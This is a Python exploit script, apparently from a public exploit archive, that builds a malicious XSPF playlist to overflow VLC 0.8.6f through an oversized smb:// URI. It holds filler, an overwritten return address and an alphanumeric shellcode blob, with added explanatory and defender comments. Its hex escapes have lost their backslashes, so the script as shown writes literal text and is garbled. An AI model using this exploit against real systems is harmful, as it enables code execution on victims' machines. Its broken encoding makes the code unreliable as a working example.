
# Title : VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)
# Published : 2009-07-31
# Author : His0k4


#!/usr/bin/python
#[*] Exploit     :      	VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)
#[*] Credits	 :		Pankaj Kohli
#[*] Exploit     : 		His0k4


# Opening part of the generated XSPF playlist. The literal is a run of hex
# pairs, each prefixed with "x"; read as byte values they spell the XML
# declaration, the <playlist> element with the xspf.org and videolan.org
# namespaces, <title>Playlist</title>, and the start of a single <track>
# whose <location> begins "smb://example.com@www.example.com/foo/#{".
# The constant stops in the middle of that URI, so whatever is appended
# after it becomes part of the smb:// location, the field the page title
# names as the overflow point in VLC 0.8.6f.
# Defender note: an XSPF <location> holding an smb:// URI with a long
# "#{...}" tail is the recognisable trait of the generated file.
header1=(
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31"
"x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22x55x54"
"x46x2dx38x22x3fx3ex0ax3cx70x6cx61x79x6cx69x73x74"
"x20x76x65x72x73x69x6fx6ex3dx22x31x22x20x78x6dx6c"
"x6ex73x3dx22x68x74x74x70x3ax2fx2fx78x73x70x66x2e"
"x6fx72x67x2fx6ex73x2fx30x2fx22x20x78x6dx6cx6ex73"
"x3ax76x6cx63x3dx22x68x74x74x70x3ax2fx2fx77x77x77"
"x2ex76x69x64x65x6fx6cx61x6ex2ex6fx72x67x2fx76x6c"
"x63x2fx70x6cx61x79x6cx69x73x74x2fx6ex73x2fx30x2f"
"x22x3ex0ax09x3cx74x69x74x6cx65x3ex50x6cx61x79x6c"
"x69x73x74x3cx2fx74x69x74x6cx65x3ex0ax09x3cx74x72"
"x61x63x6bx4cx69x73x74x3ex0ax09x09x3cx74x72x61x63"
"x6bx3ex0ax09x09x09x3cx6cx6fx63x61x74x69x6fx6ex3e"
"x73x6dx62x3ax2fx2fx65x78x61x6dx70x6cx65x2ex63x6f"
"x6dx40x77x77x77x2ex65x78x61x6dx70x6cx65x2ex63x6f"
"x6dx2fx66x6fx6fx2fx23x7b")

# Closing part of the generated XSPF playlist, in the same "x"-prefixed hex
# pair form. Read as byte values it starts with "}" and "</location>", then
# carries a <extension application="http://www.videolan.org/vlc/playlist/0">
# element containing <vlc:id>0</vlc:id>, and finally closes <track>,
# <trackList> and <playlist>.
# Its only job is to leave the document well-formed so that a playlist
# parser reaches the <location> element that precedes it.
header2=(
"x7dx3cx2fx6cx6fx63x61x74x69x6fx6ex3ex0ax09x09x09"
"x3cx65x78x74x65x6ex73x69x6fx6ex20x61x70x70x6cx69"
"x63x61x74x69x6fx6ex3dx22x68x74x74x70x3ax2fx2fx77"
"x77x77x2ex76x69x64x65x6fx6cx61x6ex2ex6fx72x67x2f"
"x76x6cx63x2fx70x6cx61x79x6cx69x73x74x2fx30x22x3e"
"x0ax09x09x09x09x3cx76x6cx63x3ax69x64x3ex30x3cx2f"
"x76x6cx63x3ax69x64x3ex0ax09x09x09x3cx2fx65x78x74"
"x65x6ex73x69x6fx6ex3ex0ax09x09x3cx2fx74x72x61x63"
"x6bx3ex0ax09x3cx2fx74x72x61x63x6bx4cx69x73x74x3e"
"x0ax3cx2fx70x6cx61x79x6cx69x73x74x3ex0ax0a")

# Code blob that the author labels as alpha2 encoded. Every character in it
# is an ASCII letter or digit, which lets it sit inside a URI/XML text field
# without being escaped or truncated.
# NOTE(review): the variable name suggests the decoded code only displays a
# message box; that cannot be confirmed from this page.
# Defender note: a long run of letters and digits with no separators inside
# a playlist <location> is not something a legitimate smb:// path contains.
popup_msg=(
"TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0"
"BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO"
"jpJHIvKOYokObPPwRN1uqt5PA")

# Assemble the playlist text. Everything between header1 and header2 ends up
# inside the smb:// <location> URI that header1 leaves open, so the order and
# the repeat counts below define the layout of the oversized field.
payload =   header1
# Filler: the "x41" unit repeated 96 times, placed ahead of the 4-byte value.
# NOTE(review): the count is the author's; its relation to the target's stack
# layout is not derivable from this page.
payload += "x41"*96
# Four hex pairs that the author annotates as a printable "push esp; retn"
# address, i.e. the value meant to replace a saved return address.
payload += "x4Ax21x51x68" # push esp;retn printable 
# The alphanumeric code blob follows directly after that value.
payload += popup_msg
# Trailing filler, the same unit repeated 43 times, before the XML is closed.
payload += "x41"*43
payload += header2
# Defender note: the flaw is an unchecked copy of the smb:// URI in
# VLC 0.8.6f (per the page title). The practical mitigations are to run a
# fixed VLC release and to treat .xspf files from untrusted sources like any
# other untrusted document. NOTE(review): the fixed version is not stated on
# this page; take it from the vendor advisory.

# Write the assembled playlist to "exploit.xspf" in the current working
# directory and report the outcome on stdout.
try:
    # Text mode "w": an existing file with the same name is overwritten.
    out_file = open("exploit.xspf","w")
    out_file.write(payload)
    # close() is only reached on the success path; if write() raises, the
    # handle is left to the interpreter to clean up.
    out_file.close()
    print("nExploit file created!n")
# NOTE(review): the bare except hides the reason for any failure (permissions,
# missing directory, full disk) behind a generic message.
except:
    # Python 2 print-statement form, unlike the call form used above.
    print "Error"
